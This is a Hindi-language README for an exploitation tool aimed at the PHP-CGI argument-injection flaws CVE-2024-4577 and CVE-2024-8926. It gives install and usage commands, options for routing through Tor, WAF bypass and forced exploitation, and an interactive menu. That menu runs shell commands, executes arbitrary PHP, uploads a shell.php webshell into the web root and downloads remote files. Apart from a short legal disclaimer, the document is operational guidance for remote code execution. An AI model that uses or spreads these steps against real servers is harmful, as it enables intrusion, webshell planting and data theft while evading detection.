
CVE-2024-4577 और CVE-2024-8926 का परीक्षण करने के लिए एक सुरक्षा पैठ उपकरण
🚀 CVE-2024-4577 और CVE-2024-8926 शोषण उपकरण
PHP-CGI पैरामीटर इंजेक्शन भेद्यता के लिए एक स्वचालित परीक्षण उपकरण, जो CVE-2024-4577 और CVE-2024-8926 का समर्थन करता है, और कमांड निष्पादन, फ़ाइल अपलोड, डाउनलोड आदि संचालन कर सकता है।
यह उपकरण PHP-CGI वातावरण में पैरामीटर इंजेक्शन भेद्यता का परीक्षण करने के लिए उपयोग किया जा सकता है, और प्रदान करता है:
यह उपकरण केवल कानूनी परीक्षण और शैक्षणिक उद्देश्यों के लिए है, कृपया अनधिकृत सिस्टम पर उपयोग न करें!
⚠️ अवैध उपयोग से कानूनी जिम्मेदारी होगी!
यह उपकरण केवल निम्नलिखित के लिए है:
यह उपकरण निम्नलिखित Python पैकेजों पर निर्भर करता है, कृपया पहले स्थापित करें:
pip install -r requirements.txt
या फिर मैन्युअल रूप से स्थापित करें:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
उदाहरण:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
| पैरामीटर | विवरण | उदाहरण |
|---|---|---|
-u , --url | लक्ष्य URL निर्दिष्ट करें | -u http://example.com |
--timeout sec | अनुरोध टाइमआउट सेट करें (0 अनंत) | --timeout 30 |
--log | शेल कमांड को स्वचालित रूप से लॉग करें | --log |
--payload | पेलोड संयोजन निर्दिष्ट या कस्टम करें | --payload 2 |
--tor | Tor के माध्यम से अनुरोध भेजें | --tor |
--verbose | विस्तृत जानकारी दिखाएँ | --verbose |
--bypass | WAF बाईपास मोड सक्षम करें | --bypass |
--force | बलपूर्वक भेद्यता शोषण मोड में प्रवेश करें | --force |
--cgipoint PATHS | परीक्षण के लिए विशिष्ट CGI पथ निर्दिष्ट करें | --cgipoint /path |
--delay sec | प्रत्येक अनुरोध के बीच विलंब सेकंड | --delay 1.5 |
--no-effects | सभी एनिमेशन और विलंब प्रभाव बंद करें | --no-effects |
जब स्क्रिप्ट को भेद्यता मिलती है, तो यह एक मेनू प्रदर्शित करेगी:
╭──────────── शोषण मोड मेनू ────────────╮
│ वर्तमान लक्ष्य:http://example.com/ │
│ वर्तमान इंजेक्शन बिंदु:/php-cgi/php-cgi.exe │
│ भेद्यता संख्या:CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 शेल मोड
2) 🛠️ PHP कस्टम मोड
3) 📤 फ़ाइल अपलोड करें
4) 📥 फ़ाइल डाउनलोड करें
5) 🎯 आक्रमण लक्ष्य बदलें
6) ⚙️ पैरामीटर सेट करें
7) ❌ प्रोग्राम से बाहर निकलें
>>
सिस्टम कमांड निष्पादित करें:
shell> whoami
📂 आउटपुट सहेजें
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
कस्टम PHP कोड निष्पादित करें:
phpinfo();
EOF
📂 आउटपुट सहेजें
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
स्थानीय फ़ाइल पथ:C:\test\shell.php
लक्ष्य पूर्ण पथ:
[*] अपलोड पथ स्वचालित रूप से सेट किया गया: C:/xampp/htdocs/shell.php
📂 मैन्युअल रूप से पथ निर्दिष्ट करें
लक्ष्य पूर्ण पथ:C:\xampp\php\shell.php
दूरस्थ फ़ाइल पथ:C:\xampp\htdocs\index.php
📂 फ़ाइल डाउनलोड करने के बाद download/ में सहेजी जाती है, यदि डुप्लिकेट हो तो स्वचालित रूप से नंबर जोड़ा जाता है
[*] फ़ाइल डाउनलोड पूर्ण, download/index.php में सहेजी गई
नया लक्ष्य URL दर्ज करें: http://newtarget.com
🔹 भेद्यता का पुनः परीक्षण करेगा
[⚙️ उपयोग चरण पैरामीटर सेटिंग मेनू]
1) पेलोड बदलें 1
2) बाईपास मॉड्यूल चयनित नहीं
3) प्रतीक्षा समय (टाइमआउट) 10 सेकंड
4) अनुरोध विलंब (डिले) 0 सेकंड
5) स्वचालित लॉग (लॉग) बंद
6) विस्तृत मोड (वर्बोज़) बंद
7) एनिमेशन प्रभाव (इफ़ेक्ट्स) चालू
8) बलपूर्वक उपयोग (फ़ोर्स) बंद
9) सहेजें और शोषण मेनू पर लौटें
निम्नलिखित बाईपास रणनीतियाँ प्रदान करता है:
php://input को अन्य लेखन से बदलना